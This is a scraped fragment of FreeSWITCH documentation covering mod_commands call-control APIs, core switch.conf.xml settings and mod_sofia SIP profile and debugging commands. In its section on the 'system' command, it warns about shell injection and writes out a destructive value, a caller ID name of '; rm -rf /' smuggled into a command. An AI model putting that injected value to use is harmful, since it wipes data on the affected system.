together.Usageuuid_bridge \u0026lt;other_uuid\u0026gt;uuid_bridge needs at least any one leg to be in the answered state. If, for example, one channel is parked and another channel is actively conversing on a call, executing uuid_bridge on these 2 channels will drop the existing call and bridge together the specified channels. uuid_broadcast Execute an arbitrary dialplan application, typically playing a media file, on a specific uuid. If a filename is specified then it is played into the channel(s). To execute an application use \u0026ldquo;app::args\u0026rdquo; syntax.Usageuuid_broadcast [aleg|bleg|both]Execute an application on a chosen leg(s) with optional hangup afterwards:Usageuuid_broadcast app[![hangup_cause]]::args [aleg|bleg|both]Examples:Exampleuuid_broadcast 336889f2-1868-11de-81a9-3f4acc8e505e sorry.wav bothuuid_broadcast 336889f2-1868-11de-81a9-3f4acc8e505e say::en\\snumber\\spronounced\\s12345 aleguuid_broadcast 336889f2-1868-11de-81a9-3f4acc8e505e say!::en\\snumber\\spronounced\\s12345 aleguuid_broadcast 336889f2-1868-11de-81a9-3f4acc8e505e say!user_busy::en\\snumber\\spronounced\\s12345 aleguuid_broadcast 336889f2-1868-11de-81a9-3f4acc8e505e playback!user_busy::sorry.wav aleg uuid_buglist List the media bugs on channel. Output is formatted as XML.Usage\nuuid_buglist uuid_chat Send a chat message.Usageuuid_chat If the endpoint associated with the session has a receive_event handler, this message gets sent to that session and is interpreted as an instant message. uuid_debug_media Debug media, either audio or video.Usageuuid_debug_media \u0026lt;read|write|both|vread|vwrite|vboth\u0026gt; \u0026lt;on|off\u0026gt;Use \u0026ldquo;read\u0026rdquo; or \u0026ldquo;write\u0026rdquo; for the audio direction to debug, or \u0026ldquo;both\u0026rdquo; for both directions. And prefix with v for video media.uuid_debug_media emits a HUGE amount of data. If you invoke this command from fs_cli, be prepared.\nExample outputR sofia/internal/1003@192.168.65.3 b= 172 192.168.65.3:17668 192.168.65.114:16072 192.168.65.114:16072 pt=0 ts=2981605109 m=0W sofia/internal/1003@192.168.65.3 b= 172 192.168.65.3:17668 192.168.65.114:16072 192.168.65.114:16072 pt=0 ts=12212960 m=0R sofia/internal/1003@192.168.65.3 b= 172 192.168.65.3:17668 192.168.65.114:16072 192.168.65.114:16072 pt=0 ts=2981605269 m=0W sofia/internal/1003@192.168.65.3 b= 172 192.168.65.3:17668 192.168.65.114:16072 192.168.65.114:16072 pt=0 ts=12213120 m=0 Read Format \u0026ldquo;R %s b=%4ld %s:%u %s:%u %s:%u pt=%d ts=%u m=%d\\n\u0026rdquo;where the values are:\nswitch_channel_get_name(switch_core_session_get_channel(session)), (long) bytes, my_host, switch_sockaddr_get_port(rtp_session-\u0026gt;local_addr), old_host, rtp_session-\u0026gt;remote_port, tx_host, switch_sockaddr_get_port(rtp_session-\u0026gt;from_addr), rtp_session-\u0026gt;recv_msg.header.pt, ntohl(rtp_session-\u0026gt;recv_msg.header.ts), rtp_session-\u0026gt;recv_msg.header.m Write Format \u0026ldquo;W %s b=%4ld %s:%u %s:%u %s:%u pt=%d ts=%u m=%d\\n\u0026rdquo;where the values are:\nswitch_channel_get_name(switch_core_session_get_channel(session)), (long) bytes, my_host, switch_sockaddr_get_port(rtp_session-\u0026gt;local_addr), old_host, rtp_session-\u0026gt;remote_port, tx_host, switch_sockaddr_get_port(rtp_session-\u0026gt;from_addr), send_msg-\u0026gt;header.pt, ntohl(send_msg-\u0026gt;header.ts), send_msg-\u0026gt;header.m); uuid_deflect Deflect an answered SIP call off of FreeSWITCH by sending the REFER methodUsage: uuid_deflect uuid_deflect waits for the final response from the far end to be reported. It returns the sip fragment from that response as the text in the FreeSWITCH response to uuid_deflect. If the far end reports the REFER was successful, then FreeSWITCH will issue a bye on the channel.Exampleuuid_deflect 0c9520c4-58e7-40c4-b7e3-819d72a98614 sip:info@example.netResponse:Content-Type: api/responseContent-Length: 30+OK:SIP/2.0 486 Busy Here uuid_displace Displace the audio for the target with the specified audio .Usage: uuid_displace [start|stop] [] [mux]Arguments:\nuuid = Unique ID of this call (see \u0026lsquo;show channels\u0026rsquo;) start|stop = Start or stop this action file = path to an audio source (.wav file, shoutcast stream, etc\u0026hellip;) limit = limit number of seconds before terminating the displacement mux = multiplex; mix the original audio together with \u0026lsquo;file\u0026rsquo;, i.e. both parties can still converse while the file is playing (if the level is not too loud) To specify the 5th argument \u0026lsquo;mux\u0026rsquo; you must specify a limit; if no time limit is desired on playback, then specify 0.Examplescli\u0026gt; uuid_displace 1a152be6-2359-11dc-8f1e-4d36f239dfb5 start /sounds/test.wav 60cli\u0026gt; uuid_displace 1a152be6-2359-11dc-8f1e-4d36f239dfb5 stop /sounds/test.wav\nuuid_display Updates the display on a phone if the phone supports this. This works on some SIP phones right now including Polycom and Snom.Usage: name|numberNote the pipe character separating the Caller ID name and Caller ID number.This command makes the phone re-negotiate the codec. The SIP -\u0026gt; RTP Packet Size should be 0.020 seconds. If it is set to 0.030 on the Cisco SPA series phones it causes a DTMF lag. When DTMF keys are pressed on the phone they are can be seen on the fs_cli 4-6 seconds late.Example:freeswitch@sidious\u0026gt; uuid_display f4053af7-a3b9-4c78-93e1-74e529658573 Fred Jones|1001+OK Success\nuuid_dual_transfer Transfer each leg of a call to different destinations.Usage: [/][/] [/][/] uuid_dump Dumps all variable values for a session.Usage: uuid_dump [format]Format options: txt (default, may be omitted), XML, JSON, plain uuid_early_ok Stops the process of ignoring early media, i.e. if ignore_early_media=true, this stops ignoring early media coming from Leg B and responds normally.Usage: uuid_early_ok uuid_exists Checks whether a given UUID exists.Usage: uuid_exists Returns true or false. uuid_flush_dtmf Flush queued DTMF digitsUsage: uuid_flush_dtmf uuid_fileman Manage the audio being played into a channel from a sound fileUsage: uuid_fileman cmd:valCommands are:\nspeed:\u0026lt;+[step]\u0026gt;|\u0026lt;-[step]\u0026gt; volume:\u0026lt;+[step]\u0026gt;|\u0026lt;-[step]\u0026gt; pause (toggle) stop truncate restart seek:\u0026lt;+[milliseconds]\u0026gt;|\u0026lt;-[milliseconds]\u0026gt; (1000ms = 1 second, 10000ms = 10 seconds.) Example to seek forward 30 seconds:uuid_fileman 0171ded1-2c31-445a-bb19-c74c659b7d08 seek:+3000(Or use the current channel via ${uuid}, e.g. in a bind_digit_action)The \u0026lsquo;pause\u0026rsquo; argument is a toggle: the first time it is invoked it will pause playback, the second time it will resume playback. uuid_getvar Get a variable from a channel.Usage: uuid_getvar uuid_hold Place a channel on hold.Usage:uuid_hold place a call on holduuid_hold off switch off on holduuid_hold toggle toggles call-state based on current call-state uuid_kill Reset a specific channel.Usage: uuid_kill [cause]If no cause code is specified, NORMAL_CLEARING will be used. uuid_limit Apply or change limit(s) on a specified uuid.Usage: uuid_limit [[/interval]] [number [dialplan [context]]]See also mod_dptools: Limit uuid_media Reinvite FreeSWITCH out of the media path:Usage: uuid_media [off] Reinvite FreeSWITCH back in:Usage: uuid_media uuid_media_reneg Tell a channel to send a re-invite with optional list of new codecs to be renegotiated.Usage: uuid_media_reneg \u0026lt;=\u0026gt;Example: Adding =PCMU makes the offered codec string absolute. uuid_park Park callUsage: uuid_park The specified channel will be parked and the other leg of the call will be disconnected. uuid_pre_answer Pre–answer a channel.Usage: uuid_preanswer See Also: Misc._Dialplan_Tools_pre_answer uuid_preprocess Pre-process ChannelUsage: uuid_preprocess uuid_recv_dtmf Usage: uuid_recv_dtmf \u0026lt;dtmf_data\u0026gt;\nuuid_send_dtmf Send DTMF digits to Usage: uuid_send_dtmf [@\u0026lt;tone_duration\u0026gt;]Use the character w for a .5 second delay and the character W for a 1 second delay.Default tone duration is 2000ms . uuid_send_info Send info to the endpointUsage: uuid_send_info uuid_session_heartbeat Usage: uuid_session_heartbeat [sched] [0|] uuid_setvar Set a variable on a channel. If value is omitted, the variable is unset.Usage: uuid_setvar [value] uuid_setvar_multi Set multiple vars on a channel.Usage: uuid_setvar_multi =[;=[;\u0026hellip;]] uuid_simplify This command directs FreeSWITCH to remove itself from the SIP signaling path if it can safely do so.Usage: uuid_simplify Execute this API command to instruct FreeSWITCH™ to inspect the Leg A and Leg B network addresses. If they are both hosted by the same switch as a result of a transfer or forwarding loop across a number of FreeSWITCH™ systems the one executing this command will remove itself from the SIP and media path and restore the endpoints to their local FreeSWITCH™ to shorten the network path. This is particularly useful in large distributed FreeSWITCH™ installations.For example, suppose a call arrives at a FreeSWITCH™ box in Los Angeles, is answered, then forwarded to a FreeSWITCH™ box in London, answered there and then forwarded back to Los Angeles. The London switch could execute uuid_simplify to tell its local switch to examine both legs of the call to determine that they could be hosted by the Los Angeles switch since both legs are local to it. Alternatively, setting sip_auto_simplify to true either globally in vars.xml or as part of a dailplan extension would tell FS to perform this check for each call when both legs supervise. uuid_transfer Transfers an existing call to a specific extension within a and . Dialplan may be \u0026ldquo;xml\u0026rdquo; or \u0026ldquo;directory\u0026rdquo;.Usageuuid_transfer [-bleg|-both] [] []\nThe optional first argument will allow you to transfer both parties (-both) or only the party to whom is talking.(-bleg). Beware that -bleg actually means \u0026ldquo;the other leg\u0026rdquo;, so when it is executed on the actual B leg uuid it will transfer the actual A leg that originated the call and disconnect the actual B leg.NOTE: if the call has been bridged, and you want to transfer either side of the call, then you will need to use (or the API equivalent). If it\u0026rsquo;s not set, transfer doesn\u0026rsquo;t really work as you\u0026rsquo;d expect, and leaves calls in limbo.And more examples see Inline Dialplan uuid_phone_event Send hold indication upstream:Usageuuid_phone_event hold|talk\nRecord/Playback Commands uuid_record Record the audio associated with the given UUID into a file. The start command causes FreeSWITCH to start mixing all call legs together and saves the result as a file in the format that the file\u0026rsquo;s extension dictates. (if available) The stop command will stop the recording and close the file. If media setup hasn\u0026rsquo;t yet happened, the file will contain silent audio until media is available. Audio will be recorded for calls that are parked. The recording will continue through the bridged call. If the call is set to return to park after the bridge, the bug will remain on the call, but no audio is recorded until the call is bridged again. (TODO: What if media doesn\u0026rsquo;t flow through FreeSWITCH? Will it re-INVITE first? Or do we just not get the audio in that case?)Usage:uuid_record [start|stop|mask|unmask] []Where limit is the max number of seconds to record.If the path is not specified on start it will default to the channel variable \u0026ldquo;sound_prefix\u0026rdquo; or FreeSWITCH base_dir when the \u0026ldquo;sound_prefix\u0026rdquo; is empty.You may also specify \u0026ldquo;all\u0026rdquo; for path when stop is used to remove all for this uuid\u0026ldquo;stop\u0026rdquo; command must be followed by option.\u0026ldquo;mask\u0026rdquo; will mask with silence part of the recording beginning when the mask argument is executed by this command. see http://jira.freeswitch.org/browse/FS-5269.\u0026ldquo;unmask\u0026rdquo; will stop the masking and continue recording live audio normally.See record\u0026rsquo;s related variablesyou will also want to see mod_dptools: record_session Limit Commands More information is available at Limit commands limit_reset Reset a limit backend. limit_status Retrieve status from a limit backend. limit_usage Retrieve usage for a given resource. uuid_limit_release Manually decrease a resource usage by one. limit_interval_reset Reset the interval counter to zero prior to the start of the next interval. Miscellaneous Commands bg_system Execute a system command in the background.Usage: bg_system echo Echo input back to the consoleUsage: echo Example:echo This text will appearThis text will appear file_exists Tests whether filename exists.file_exists filenameExamples:freeswitch\u0026gt; file_exists /tmp/real_filetrue\nfreeswitch\u0026gt; file_exists /tmp/missing_filefalseExample dialplan usage:file_exists example\nfile_exists tests whether FreeSWITCH can see the file, but the file may still be unreadable because of restrictive permissions.\nfind_user_xml Checks to see if a user exists. Matches user tags found in the directory, similar to user_exists, but returns an XML representation of the user as defined in the directory (like the one shown in user_exists).Usage: find_user_xml references a key specified in a directory\u0026rsquo;s user tag represents the value of the key is the domain to which the user is assigned. list_users Lists Users configured in DirectoryUsage:list_users [group ] [domain ] [user ] [context ]Examples:freeswitch@localhost\u0026gt; list_users group default\nuserid|context|domain|group|contact|callgroup|effective_caller_id_name|effective_caller_id_number2000|default|192.168.20.73|default|sofia/internal/sip:2000@192.168.20.219:5060|techsupport|B#-Test 2000|20002001|default|192.168.20.73|default|sofia/internal/sip:2001@192.168.20.150:63412;rinstance=8e2c8b86809acf2a|techsupport|Test 2001|20012002|default|192.168.20.73|default|error/user_not_registered|techsupport|Test 2002|20022003|default|192.168.20.73|default|sofia/internal/sip:2003@192.168.20.149:5060|techsupport|Test 2003|20032004|default|192.168.20.73|default|error/user_not_registered|techsupport|Test 2004|2004\n+OKSearch filters can be combined:freeswitch@localhost\u0026gt; list_users group default user 2004\nuserid|context|domain|group|contact|callgroup|effective_caller_id_name|effective_caller_id_number2004|default|192.168.20.73|default|error/user_not_registered|techsupport|Test 2004|2004\n+OK sched_api Schedule an API call in the future.Usage:sched_api [+@] \u0026lt;group_name\u0026gt; \u0026lt;command_string\u0026gt;[\u0026amp;] is the UNIX timestamp at which the command should be executed. If it is prefixed by +, specifies the number of seconds to wait before executing the command. If prefixed by @, it will execute the command periodically every seconds; for the first instance it will be executed after seconds.\u0026lt;group_name\u0026gt; will be the value of \u0026ldquo;Task-Group\u0026rdquo; in generated events. \u0026ldquo;none\u0026rdquo; is the proper value for no group. If set to UUID of channel (example: ${uuid}), task will automatically be unscheduled when channel hangs up.\u0026lt;command_string\u0026gt; is the command to execute at the scheduled time.A scheduled task or group of tasks can be revoked with sched_del or unsched_api.You could append the \u0026ldquo;\u0026amp;\u0026rdquo; symbol to the end of the line to executed this command in its own thread.Example:sched_api +1800 none originate sofia/internal/1000%${sip_profile} \u0026amp;echo()sched_api @600 check_sched log Periodic task is running\u0026hellip;sched_api +10 ${uuid} chat verto|fs@mydomain.com|1000@mydomain.com|Hello World sched_broadcast Play a file to a specific call in the future.Usage:sched_broadcast [[+]|@time] [aleg|bleg|both]Schedule execution of an application on a chosen leg(s) with optional hangup:sched_broadcast [+] app[![hangup_cause]]::args [aleg|bleg|both] is the UNIX timestamp at which the command should be executed. If it is prefixed by +, specifies the number of seconds to wait before executing the command. If prefixed by @, it will execute the command periodically every seconds; for the first instance it will be executed after seconds.Examples:sched_broadcast +60 336889f2-1868-11de-81a9-3f4acc8e505e commercial.wav bothsched_broadcast +60 336889f2-1868-11de-81a9-3f4acc8e505e say::en\\snumber\\spronounced\\s12345 aleg sched_del Removes a prior scheduled group or task IDUsage:sched_del \u0026lt;group_name|task_id\u0026gt;The one argument can either be a group of prior scheduled tasks or the returned task-id from sched_api.sched_transfer, sched_hangup and sched_broadcast commands add new tasks with group names equal to the channel UUID. Thus, sched_del with the channel UUID as the argument will remove all previously scheduled hangups, transfers and broadcasts for this channel.Examples:sched_del my_groupsched_del 2 sched_hangup Schedule a running call to hangup.Usage:sched_hangup [+] []sched_hangup +0 is the same as uuid_kill sched_transfer Schedule a transfer for a running call.Usage:sched_transfer [+] [] [] stun Executes a STUN lookup.Usage:stun [:port]Example:stun stun.freeswitch.org system Execute a system command.Usage:system The is passed to the system shell, where it may be expanded or interpreted in ways you don\u0026rsquo;t expect. This can lead to security bugs if you\u0026rsquo;re not careful. For example, the following command is dangerous:If a malicious remote caller somehow sets his caller ID name to \u0026ldquo;; rm -rf /\u0026rdquo; you would unintentionally be executing this shell command:log_caller_name; rm -rf /This would be a Bad Thing. time_test Runs a test to see how bad timer jitter is. It runs the test times if specified, otherwise it uses the default count of 10, and tries to sleep for mss microseconds. It returns the actual timer duration along with an average.Usage:time_test [count]Example:time_test 100 5\ntest 1 sleep 100 99test 2 sleep 100 97test 3 sleep 100 96test 4 sleep 100 97test 5 sleep 100 102avg 98 timer_test Runs a test to see how bad timer jitter is. Unlike time_test, this uses the actual FreeSWITCH timer infrastructure to do the timer test and exercises the timers used for call processing.Usage:timer_test \u0026lt;10|20|40|60|120\u0026gt; [\u0026lt;1..200\u0026gt;] [\u0026lt;timer_name\u0026gt;]The first argument is the timer interval.The second is the number of test iterations.The third is the timer name; \u0026ldquo;show timers\u0026rdquo; will give you a list.Example:timer_test 20 3\nAvg: 16.408ms Total Time: 49.269ms\n2010-01-29 12:01:15.504280 [CONSOLE] mod_commands.c:310 Timer Test: 1 sleep 20 92542010-01-29 12:01:15.524351 [CONSOLE] mod_commands.c:310 Timer Test: 2 sleep 20 200422010-01-29 12:01:15.544336 [CONSOLE] mod_commands.c:310 Timer Test: 3 sleep 20 19928 tone_detect Start Tone Detection on a channel.Usage:tone_detect \u0026lt;tone_spec\u0026gt; [ ] is required when this is executed as an api call; as a dialplan app the uuid is implicit as part of the channel variables is an arbitrary name that identifies this tone_detect instance; required\u0026lt;tone_spec\u0026gt; frequencies to detect; required \u0026lsquo;r\u0026rsquo; or \u0026lsquo;w\u0026rsquo; to specify which direction to monitor duration during which to detect tones;0 = detect forever+time = number of milliseconds after tone_detect is executedtime = absolute time to stop in seconds since The Epoch (1 January, 1970) FS application to execute when tone_detect is triggered; if app is omitted, only an event will be returned arguments to application enclosed in single quotes the number of times tone_detect should be triggered before executing the specified appOnce tone_detect returns a result, it will not trigger again until reset. Reset tone_detect by calling tone_detect with no additional arguments to reactivate the previously specified tone_detect declaration.See also http://wiki.freeswitch.org/wiki/Misc._Dialplan_Tools_tone_detect unsched_api Unschedule a previously scheduled API command.Usage:unsched_api \u0026lt;task_id\u0026gt; url_decode Usage:url_decode url_encode Url encode a string.Usage:url_encode user_data Retrieves user information (parameters or variables) as defined in the FreeSWITCH user directory.Usage:user_data @ \u0026lt;attr|var|param\u0026gt; is the user\u0026rsquo;s id is the user\u0026rsquo;s domain\u0026lt;attr|var|param\u0026gt; specifies whether the requested data is contained in the \u0026ldquo;variables\u0026rdquo; or \u0026ldquo;parameters\u0026rdquo; section of the user\u0026rsquo;s record is the name (key) of the variable to retrieveExamples:user_data 1000@192.168.1.101 param passwordwill return a result of 1234, anduser_data 1000@192.168.1.101 var accountcodewill return a result of 1000 from the example user shown in user_exists, anduser_data 1000@192.168.1.101 attr idwill return the user\u0026rsquo;s actual alphanumeric ID (i.e. \u0026ldquo;john\u0026rdquo;) when number-alias=\u0026ldquo;1000\u0026rdquo; was set as an attribute for that user. user_exists Checks to see if a user exists. Matches user tags found in the directory and returns either true/false:Usage:user_exists references a key specified in a directory\u0026rsquo;s user tag represents the value of the key is the domain to which the user belongsExample:user_exists id 1000 192.168.1.101will return true where there exists in the directory a user with a key called id whose value equals 1000:User Directory EntryIn the above example, we also could have tested for randomvar:user_exists randomvar 45 192.168.1.101And we would have received the same true result, but:user_exists accountcode 1000 192.168.1.101oruser_exists vm-password 1000 192.168.1.101Would have returned false.\n","permalink":"https://wdd.js.org/freeswitch/mod-command/","summary":"Usage CLI See below. API/Event Interfaces mod_event_socket mod_erlang_event mod_xml_rpc Scripting Interfaces mod_perl mod_v8 mod_python mod_lua From the Dialplan An API command can be called from the dialplan. Example:Invoke API Command From DialplanOther examples:Other Dialplan API Command ExamplesAPI commands with multiple arguments usually have the arguments separated by a space:Multiple Arguments\nDialplan UsageIf you are calling an API command from the dialplan make absolutely certain that there isn\u0026rsquo;t already a dialplan application that gives you the functionality you are looking for.","title":"mod_commands"},{"content":"The FreeSWITCH core configuration is contained in autoload_configs/switch.conf.xml\nDefault key bindings Function keys can be mapped to API commands using the following configuration:The default keybindings are;F1 = helpF2 = statusF3 = show channelsF4 = show callsF5 = sofia statusF6 = reloadxmlF7 = console loglevel 0F8 = console loglevel 7F9 = sofia status profile internalF10 = sofia profile internal siptrace onF11 = sofia profile internal siptrace offF12 = versionBeware that the option loglevel is actually setting the minimum hard_log_Level in the application. What this means is if you set this to something other than DEBUG no matter what log level you set the console to one you start up you will not be able to get any log messages below the level you set. Also be careful of mis-typing a log level, if the log level is not correct it will default to a hard_log_level of 0. This means that virtually no log messages will show up anywhere. Core parameters core-db-dsn Allows to use ODBC database instead of sqlite3 for freeswitch core.Syntaxdsn:user:pass max-db-handlesMaximum number of simultaneous DB handles open db-handle-timeout Maximum number of seconds to wait for a new DB handle before failing disable-monotonic-timing (bool) disables monotonic timer/clock support if it is broken on your system. enable-use-system-time Enables FreeSWITCH to use system time. initial-event-threads Number of event dispatch threads to allocate in the core. Default is 1.If you see the WARNING \u0026ldquo;Create additional event dispatch thread\u0026rdquo; on a heavily loaded server, you could increase the number of threads to prevent the system from falling behind. loglevel amount of detail to show in log max-sessions limits the total number of concurrent channels on your FreeSWITCH™ system. sessions-per-second throttling mechanism, the switch will only create this many channels at most, per second. rtp-start-port RTP port range begin rtp-end-port RTP port range end Variables Variables are default channel variables set on each channel automatically. Example config ","permalink":"https://wdd.js.org/freeswitch/xml-config/","summary":"The FreeSWITCH core configuration is contained in autoload_configs/switch.conf.xml\nDefault key bindings Function keys can be mapped to API commands using the following configuration:The default keybindings are;F1 = helpF2 = statusF3 = show channelsF4 = show callsF5 = sofia statusF6 = reloadxmlF7 = console loglevel 0F8 = console loglevel 7F9 = sofia status profile internalF10 = sofia profile internal siptrace onF11 = sofia profile internal siptrace offF12 = versionBeware that the option loglevel is actually setting the minimum hard_log_Level in the application.","title":"XML Switch Configuration"},{"content":"Sofia is a SIP stack used by FreeSWITCH. When you see \u0026ldquo;sofia\u0026rdquo; anywhere in your configuration, think \u0026ldquo;This is SIP stuff.\u0026rdquo; It takes a while to master it all, so please be patient with yourself. SIP is a crazy protocol and it will make you crazy too if you aren\u0026rsquo;t careful. Read on for information on setting up SIP/Sofia in your FreeSWITCH configuration.\nmod_sofia exposes the Sofia API and sets up the FreeSWITCH SIP endpoint. Endpoint A FreeSWITCH endpoint represents a full user agent and controls the signaling protocol and media streaming necessary to process calls. The endpoint is analogous to a physical VoIP telephone sitting on your desk. It speaks a particular protocol such as SIP or Verto, to the outside world and interprets that for the FreeSWITCH core. Configuration Files sofia.conf.xml contains the configuration settings for mod_sofiaSee Sofia Configuration Files. SIP profiles See SIP profiles section in Configuring FreeSWITCH. What if these commands don\u0026rsquo;t work for me? Make sure that you are not running another SIP server at the same time as FreeSWITCH. It is not always obvious that another SIP server is running. If you type in Sofia commands such as \u0026lsquo;sofia status profile default\u0026rsquo; and it doesn\u0026rsquo;t work then you may have another SIP server running. Stop the other SIP server and restart FreeSWITCH.On Linux, you may wish to try, as a superuser (often \u0026ldquo;root\u0026rdquo;):netstat -lunp | less# -l show listeners, -u show only UDP sockets,# -n numeric output (do not translate addresses or UDP port numbers)# -p show process information (PID, command). Only the superuser is allowed to see this infoWith the less search facility (usually the keystroke \u0026ldquo;/\u0026rdquo;), look for :5060 which is the usual SIP port.To narrow the focus, you can use grep. In the example configs, port 5060 is the \u0026ldquo;internal\u0026rdquo; profile. Try this:netstat -lnp | grep 5060See if something other than FreeSWITCH is using port 5060. Sofia Recover sofia recoverYou can ask Sofia to recover calls that were up, after crashing (or other scenarios).Sofia recover can also be used, if your core db uses ODBC to achieve HA / failover.For FreeSWITCH HA configuration, see Freeswitch HA. Flushing and rebooting registered endpoints You can flush a registration or reboot specific registered endpoint by issuing a flush_inbound_reg command from the console.freeswitch\u0026gt; sofia profile \u0026lt;profile_name\u0026gt; flush_inbound_reg [\u0026lt;call_id\u0026gt;|user@host] [reboot]If you leave out \u0026lt;call_id\u0026gt; and/or user@host, you will flush/reboot every registered endpoint on a profile.\nNote: For polycom phone, the command causes the phone to check its configuration from the server. If the file is different (you may add extra space at the end of file), the phone will reboot. You should not change the value of voIpProt.SIP.specialEvent.checkSync.alwaysReboot=\u0026ldquo;0\u0026rdquo; to \u0026ldquo;1\u0026rdquo; in sip.cfg as that allows potential a DOS attack on the phone. You can also use the check_sync command:sofia profile \u0026lt;profile_name\u0026gt; check_sync \u0026lt;call_id\u0026gt; | user@domain\nNote: The polycom phones do not reload -directory.xml configuration in response to either of these commands, they only reload the configuration. If you want new speed dials to take effect, you\u0026rsquo;ll need to do a full reboot of the phone or enable the alwaysReboot option. (Suggestions from anyone with more detailed PolyCom knowledge would be appreciated here.) Starting a new profile If you have created a new profile you need to start it from the console:freeswitch\u0026gt; sofia profile \u0026lt;new_profile_name\u0026gt; start Reloading profiles and gateways You can reload a specific SIP profile by issuing a rescan/restart command from the consolefreeswitch\u0026gt; sofia profile \u0026lt;profile_name\u0026gt; [|] reloadxmlThe difference between rescan and restart is that rescan will just load new config and not stop FreeSWITCH from processing any more calls on a profile.** Some config options like IP address and (UDP) port are not reloaded with rescan.** Deleting gateways You can delete a specific gateway by issuing a killgw command from the console. If you use all as gateway name, all gateways will be killedfreeswitch\u0026gt; sofia profile \u0026lt;profile_name\u0026gt; killgw \u0026lt;gateway_name\u0026gt; Restarting gateways You can force a gateway to restart ( good for forcing a re-registration or similar ) by issuing a killgw command from the console followed by a profile rescan. This is safe to perform on a profile that has active calls.freeswitch\u0026gt; sofia profile \u0026lt;profile_name\u0026gt; killgw \u0026lt;gateway_name\u0026gt;freeswitch\u0026gt; sofia profile \u0026lt;profile_name\u0026gt; rescan Adding / Changing Existing Gateways It will be assumed that you have all your gateways in the /usr/local/freeswitch/conf/sip_profiles/external directory and that you have just created a new entry. You can add a new gateway to FreeSWITCH by issuing a rescan reloadxml command from the console as seen in the example below. This will load the newly created gateway and not affect any calls that are currently up.freeswitch\u0026gt; sofia profile external rescan reloadxml\nYou now realize that you have screwed up the IP address in the new gateway and need to change it. So you edit your gateway file and make any changes that you want. You will then need to issue the following commands to destroy the gateway, and then have FreeSWITCH reload the changes with affecting any existing calls that are currently up.\nfreeswitch\u0026gt; sofia profile external killgw \u0026lt;gateway_name\u0026gt;freeswitch\u0026gt; sofia profile external rescan reloadxml View SIP Registrations You can view all the devices that have registered by running the following from the console.freeswitch\u0026gt; sofia status profile regfreeswitch\u0026gt; sofia status profile default regfreeswitch\u0026gt; sofia status profile outbound regYou can also use the xmlstatus key to retrieve statuses in XML format. This is specially useful if you are using mod_xml_rpc.Commands are as follows:freeswitch\u0026gt; sofia xmlstatus profile regfreeswitch\u0026gt; sofia xmlstatus profile default regfreeswitch\u0026gt; sofia xmlstatus profile outbound reg List the status of gateways For the gateways that are in-service:freeswitch\u0026gt; sofia profile gwlist upFor the gateways that are out-of-service:freeswitch\u0026gt; sofia profile gwlist downNotes:\nIt should be used together with . See Sofia_Configuration_Files It can also be used to feed into mod distributor to exclude dead gateways. List gateway data To retrieve the value of an inbound variable:sofia_gateway_data \u0026lt;gateway_name\u0026gt; ivar To retrieve the value of an outbound variable:sofia_gateway_data \u0026lt;gateway_name\u0026gt; ovar To retrieve the value of either use:sofia_gateway_data \u0026lt;gateway_name\u0026gt; var This first checks for an inbound variable, then checks for an outbound variable if there\u0026rsquo;s no matching inbound. View User Presence Data Displays presence data from registered devices as seen by the serverUsage:sofia_presence_data [list|status|rpid|user_agent] [profile/]@domainsofia_presence_data list */2005status|rpid|user_agent|network_ip|network_portAway|away|Bria 3 release 3.5.1 stamp 69738|192.168.20.150|21368+OK\nIts possible to retrieve only one valuesofia_presence_data status */2005Away\nYou can use this value in the dialplan, e.g. Debugging Sofia-SIP The Sofia-SIP components can output various debugging information. The detail of the debugging output is determined by the debugging level. The level is usually module-specific and it can be modified by module-specific environment variable. There is also a default level for all modules, controlled by environment variable #SOFIA_DEBUG.The environment variables controlling the logging and other debug output are as follows:- #SOFIA_DEBUG Default debug level (0..9)- #NUA_DEBUG User Agent engine (nua) debug level (0..9)- #SOA_DEBUG SDP Offer/Answer engine (soa) debug level (0..9)- #NEA_DEBUG Event engine (nea) debug level (0..9)- #IPTSEC_DEBUG HTTP/SIP authentication module debug level (0..9)- #NTA_DEBUG Transaction engine debug level (0..9)- #TPORT_DEBUG Transport event debug level (0..9)- #TPORT_LOG If set, print out all parsed SIP messages on transport layer- #TPORT_DUMP Filename for dumping unparsed messages from transport- #SU_DEBUG su module debug level (0..9)The defined debug output levels are:- 0 SU_DEBUG_0() - fatal errors, panic- 1 SU_DEBUG_1() - critical errors, minimal progress at subsystem level- 2 SU_DEBUG_2() - non-critical errors- 3 SU_DEBUG_3() - warnings, progress messages- 5 SU_DEBUG_5() - signaling protocol actions (incoming packets, \u0026hellip;)- 7 SU_DEBUG_7() - media protocol actions (incoming packets, \u0026hellip;)- 9 SU_DEBUG_9() - entering/exiting functions, very verbatim progressStarting with 1.0.4, those parameters can be controlled from the console by doingfreeswitch\u0026gt; sofia loglevel \u0026lt;all|default|tport|iptsec|nea|nta|nth_client|nth_server|nua|soa|sresolv|stun\u0026gt; [0-9]\u0026ldquo;all\u0026rdquo; Will change every component\u0026rsquo;s loglevelA log level of 0 turns off debugging, to turn them all off, you can dofreeswitch\u0026gt; sofia loglevel all 0To report a bug, you can turn on debugging with more verbosesofia global siptrace onsofia loglevel all 9sofia tracelevel alertconsole loglevel debugfsctl debug_level 10 Debugging presence and SLA As of Jan 14, 2011, sofia supports a new debugging command: sofia global debug. It can turn on debugging for SLA, presence, or both. Usage is:sofia global debug slasofia global debug presencesofia global debug noneThe first two enable debugging SLA and presence, respectively. The third one turns off SLA and/or presence debugging. Sample Export (Linux/Unix) Alternatively, the levels can also be read from environment variables. The following bash commands turn on all debugging levels, and is equivalent to \u0026ldquo;sofia loglevel all 9\u0026rdquo;export SOFIA_DEBUG=9export NUA_DEBUG=9export SOA_DEBUG=9export NEA_DEBUG=9export IPTSEC_DEBUG=9export NTA_DEBUG=9export TPORT_DEBUG=9export TPORT_LOG=9export TPORT_DUMP=/tmp/tport_sip.logexport SU_DEBUG=9To turn this debugging off again, you have to exit FreeSWITCH and type unset. For example:unset TPORT_LOG Sample Set (Windows) The following bash commands turn on all debugging levels.set SOFIA_DEBUG=9set NUA_DEBUG=9set SOA_DEBUG=9set NEA_DEBUG=9set IPTSEC_DEBUG=9set NTA_DEBUG=9set TPORT_DEBUG=9set TPORT_LOG=9set TPORT_DUMP=/tmp/tport_sip.logset SU_DEBUG=9To turn this debugging off again, you have to exit FreeSWITCH and type unset. For example:set TPORT_LOG=You can also control SIP Debug output within fs_cli, the FreeSWITCH client app.freeswitch\u0026gt; sofia profile siptrace on|offOn newer software release, you can now be able to issue siptrace for all profiles:sofia global siptrace [on|off]\nTo have the SIP Debug details put in the /usr/local/freeswitch/log/freeswitch.log file, usefreeswitch\u0026gt; sofia tracelevel info (or any other loglevel name or number)To have the SIP details put into the log file automatically on startup, add this to 